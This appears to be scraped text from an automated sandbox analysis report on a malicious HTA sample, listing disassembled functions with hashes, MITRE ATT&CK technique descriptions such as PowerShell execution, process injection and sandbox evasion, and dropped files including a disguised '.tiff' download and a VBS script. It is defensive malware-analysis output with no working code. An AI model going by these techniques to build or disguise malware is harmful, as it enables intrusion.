$]q, xrefs: 07980516
$]q, xrefs: 0798056C
4']q, xrefs: 07980593

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$$]q$$]q
API String ID: 0-3019551829
Opcode ID: fd3a1e766495e9db4f66478b163517e5eb9ddcd43efc36404eb3e09fa820a58c
Instruction ID: 928e29a2b7775844e8ecf3d8ce600e04e15ba02b74d986d092ffb96ce6253ba7
Opcode Fuzzy Hash: fd3a1e766495e9db4f66478b163517e5eb9ddcd43efc36404eb3e09fa820a58c
Instruction Fuzzy Hash: 143136F06143069FCBA4AF2EC50177A7BA9AF81318F188276D805DB291E775D948C771

Function 04E44FC0 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3049070772.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fec17dfa9d7f2433cf23fb75b5ad443d15247bf4ed7980a1b84cbb67e5b887
Instruction ID: 0c3743c6f81ea5d3860dc3f9fa501621d2ac7a10a36afb7882eeba791d7e2222
Opcode Fuzzy Hash: 41fec17dfa9d7f2433cf23fb75b5ad443d15247bf4ed7980a1b84cbb67e5b887
Instruction Fuzzy Hash: 2FD12734E01208EFDB04CFA8E584AADFBB2EF88314F258159E905AB365C771ED45CB90

Function 04E430F0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3049070772.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c47f1522869d5ee38543c28e3d88f96839d3dc8ff976dc789f16e024113832dd
Instruction ID: 84836841071b9e0583ca60625a603add10a51d231bd210108a5e8c3886800c79
Opcode Fuzzy Hash: c47f1522869d5ee38543c28e3d88f96839d3dc8ff976dc789f16e024113832dd
Instruction Fuzzy Hash: B2918874A002099FCB05CF99C5949BEFBB1FF89314B248699D865AB365C731FC91CBA0

Function 079822C1 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32fe320f004b84a76b152ef06247fa1c701404637d08ca0015dee8e98945751
Instruction ID: a0554aa4522a2bfcf57a8cd9b868f179c1fd72d2d2b118f240d2aa90da84edd3
Opcode Fuzzy Hash: a32fe320f004b84a76b152ef06247fa1c701404637d08ca0015dee8e98945751
Instruction Fuzzy Hash: D3414CF0A04302CFCB91AF24D941A797BB9FF86A18B5980BAD801DF252D731D941C771

Function 04E44F70 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3049070772.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27732f08a880903190ea9bece2eb471e479c2c5d3710eba995ca890a2b3c9b85
Instruction ID: 0129a35135255767b0e1809a1748fdeca05d1dd327d5d3c4f2c04b9690d0aa39
Opcode Fuzzy Hash: 27732f08a880903190ea9bece2eb471e479c2c5d3710eba995ca890a2b3c9b85
Instruction Fuzzy Hash: 8F315E74A093859FCB02DF68D89099ABFB0BF4A310B19459AD885EB353D235AC45CBA1

Function 07980B10 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd53ba9e8ec8125284c4a8c732bfd75088142e71346556622006847ec1156dcd
Instruction ID: 851d6f9583631500eef1dcbae9a2cea53b6b85f634897c9e46621d99f619b254
Opcode Fuzzy Hash: dd53ba9e8ec8125284c4a8c732bfd75088142e71346556622006847ec1156dcd
Instruction Fuzzy Hash: 85F0C2B490D3C58FC747A7789864691BFB19F87108B0D85CBD4848F6B3D561880AC72B

Non-executed Functions

Function 079839C8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07983A30
$]q, xrefs: 07983A24
$]q, xrefs: 079839DA
$]q, xrefs: 079839F6

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 8b0f8258709b9d538baf56aba0173f6796609e161a514aa3708ba2082d737f2d
Instruction ID: 6c9efb8d75eee8d2a74b23cf3263dea1958c90ee9e61196597e083735f9172ee
Opcode Fuzzy Hash: 8b0f8258709b9d538baf56aba0173f6796609e161a514aa3708ba2082d737f2d
Instruction Fuzzy Hash: CA2137B1314302ABDB64666A8850B3B7BDE9BC1F19F64883A984ACF381DD76C8418361

Function 07980081 Relevance: 5.0, Strings: 4, Instructions: 41COMMON

Download Yara Rule

Strings

$]q, xrefs: 079800D6
4']q, xrefs: 079800EB
4']q, xrefs: 079800F7
$]q, xrefs: 079800CA

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: e51668fcce8b75552000d014d1e33818884b5a863eb808e9f8ae5b99edad43f6
Instruction ID: 084852f4136cbcf6968053dee73a3a17e1681058c1e4b2029dbdab8f37cca0fe
Opcode Fuzzy Hash: e51668fcce8b75552000d014d1e33818884b5a863eb808e9f8ae5b99edad43f6
Instruction Fuzzy Hash: BD01F4717083424FC76E6B6C19302356FB6AFC2954B2A85ABC491DF297CD698C09C396

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report na.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\verybestthingswesharedfornew[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.0.cs

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.out

C:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP

C:\Users\user\AppData\Local\Temp\RES15CB.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awikqj3p.32t.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ia1s23iz.eys.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lczi1jlh.nav.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qs11iz2s.ntg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnuasuvz.ula.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulas1yit.wkq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yosati0i.hkt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo3v0nrn.1ak.ps1

C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS

Windows Analysis Report
na.hta

Function 02A37A18 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Function 07101F40 Relevance: 5.6, Strings: 4, Instructions: 579
COMMON

Function 07104610 Relevance: 2.9, Strings: 2, Instructions: 442
COMMON

Function 071004F8 Relevance: 2.7, Strings: 2, Instructions: 154
COMMON

Function 02A31BF8 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Function 071045F5 Relevance: 1.5, Strings: 1, Instructions: 244
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre